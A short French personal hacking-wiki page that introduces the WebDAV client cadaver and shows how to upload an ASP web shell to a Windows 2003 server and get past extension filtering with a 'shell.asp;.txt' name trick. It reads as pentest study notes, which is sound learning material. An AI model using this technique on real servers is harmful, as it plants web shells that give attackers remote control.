Hacking Wiki

Notes persos. Il y a probablement beaucoup d'erreurs donc privilégiez des sources plus fiables.

View on GitHub

Outils

cadaver

L’outil cadaver permet d’intéragir avec WebDAV:

cadaver 192.168.31.229

Exploitation

Sous Windows 2003

Il est possible d’uploader un shell ASP et de bypasser les restrictions sur les extensions:

dav:/> put shell.asp shell.txt
Uploading shell.asp to `/shell.txt':
Progress: [=============================>] 100.0% of 38013 bytes succeeded.
dav:/> copy shell.txt shell.asp;.txt
Copying `/shell.txt' to `/shell.asp%3b.txt':  authentication failed.

Puis on accéde au shell via http://192.168.31.229/shell.asp%3b.txt.

Ressources

Catégorie:Technologies